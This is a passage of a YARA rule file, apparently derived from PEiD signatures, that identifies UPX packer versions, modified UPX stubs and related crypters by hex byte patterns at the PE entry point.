88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v11_CyberDoom_Bob: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? 00 60 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v051: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 8D B0 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 D8 01 ?? ?? 83 CD FF 31 DB ?? ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 0B 8A 06 46 88 07 47 EB EB 90 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXFreak_V01_HMX0101: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n        $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0761_pe_exe_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXShit_006_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? E2 FA E9 D6 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 F0 01 00 00 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_UPX_0896_102_105_124_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 }\r\n        $b = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_02_UPX_06: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_121_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 31 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 83 E8 48 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 F8 01 00 00 83 CD FF 31 DB EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Inliner_v10_by_GPcH_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_v01_500mhz_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5D 8B CD 81 ED 7A 29 40 00 89 AD 0F 6D 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_stub: PEiD\r\n{\r\n    strings:\r\n        $a = { 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 84 ?? 00 00 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 88 ?? 00 00 61 E9 ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modifier_v01x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }\r\n        $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v062: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 66 81 87 8D B0 EC 01 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2A 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 56 89 FE 29 C6 F3 A4 5E EB 9F 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 FF D3 11 C9 FF D3 72 F8 C3 31 C0 31 DB 31 C9 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F 0E 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 89 D8 E2 D9 8D BE ?? ?? ?? ?? 8B 07 09 C0 74 45 8B 5F 04 8D 84 30 ?? ?? ?? ?? 01 F3 50 83 C7 08 FF 96 ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 ?? ?? ?? ?? 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Modified_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Modified: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB 8A 07 EB B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 }\r\n        $b = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v051_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_dj_siba: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? 43 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 00 00 00 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_300_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n        $b = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_071_072_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 09 00 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Inliner_10_by_GPcH: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0991_0993_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE B0 00 00 00 8D BE 50 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n        $b = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXLock_v10_CyberDoom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_122_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 32 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306_OnToL: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_082_083_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { 81 FC 00 00 77 02 CD 20 B9 00 00 BE 00 00 BF 00 00 BB 00 80 FD F3 A4 FC 87 F7 83 EE C6 19 ED 57 57 E9 00 00 55 50 58 21 0A 01 04 07 00 00 00 00 00 00 00 00 00 00 00 00 06 00 FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule SkD_Undetectabler_Pro_20_No_UPX_Method_SkD_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 B8 FC 26 00 10 E8 EC F3 FF FF 6A 0F E8 15 F5 FF FF E8 64 FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V300_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_05_snaker: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 F9 00 7E 06 80 30 ?? 40 E2 F5 E9 ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_UPX_0896_102_105_124_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 64 A0 23 00 00 00 83 C5 06 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXShit_006: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? E2 FA E9 D6 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_070_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 08 00 02 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_V3042005_MANtiCORE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? ?? ?? ?? ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_v12_Marcus_Lazlo_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 05 A4 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 F2 31 C0 40 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 E6 31 C9 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Password_Protector_for_the_UPX_030_g0d: PEiD\r\n{\r\n    strings:\r\n        $a = { C8 50 01 00 60 E8 EC 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 44 69 61 6C 6F 67 42 6F 78 49 6E 64 69 72 65 63 74 50 61 72 61 6D 41 00 53 65 6E 64 4D 65 73 73 61 67 65 41 00 45 6E 64 44 69 61 6C 6F 67 00 00 00 55 8B EC 57 BF 00 00 00 00 33 C0 81 6D 0C 10 01 00 00 75 03 40 EB 13 83 7D 0C 01 75 0D 66 83 7D 10 0B 75 0B FF 75 14 8F 47 E4 5F 5D C2 10 00 66 83 7D 10 02 77 F4 74 0E 8D 4F A0 51 6A 40 6A 0D FF 77 E4 FF 57 E8 50 FF 75 08 FF 57 EC EB DB 84 08 C8 90 00 00 00 00 01 00 64 00 64 00 64 00 14 00 00 00 00 00 45 00 6E 00 74 00 65 00 72 00 20 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64 00 00 00 A0 00 00 50 00 00 02 00 05 00 05 00 5A 00 0A 00 0B 00 FF FF 81 00 00 00 00 00 5E FC 8D BE AA FE FF FF 8D 86 }\r\n        $b = { C8 50 01 00 60 E8 EC 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 44 69 61 6C 6F 67 42 6F 78 49 6E 64 69 72 65 63 74 50 61 72 61 6D 41 00 53 65 6E 64 4D 65 73 73 61 67 65 41 00 45 6E 64 44 69 61 6C 6F }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_290_LZMA_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_wwwupxsourceforgenet: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? 00 8D BE ?? ?? ?? FF }\r\n        $b = { 60 BE ?? ?0 ?? 00 8D BE ?? ?? F? FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_030_040_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 BF C0 FF BD FF FF FD F3 A4 FC F7 E1 93 87 F7 83 C6 00 57 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_modifyer_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 02 00 00 00 CD 03 5A 81 C2 ?? ?? ?? ?? 81 C2 ?? ?? ?? ?? 89 D1 81 C1 3C 05 00 00 52 81 2A 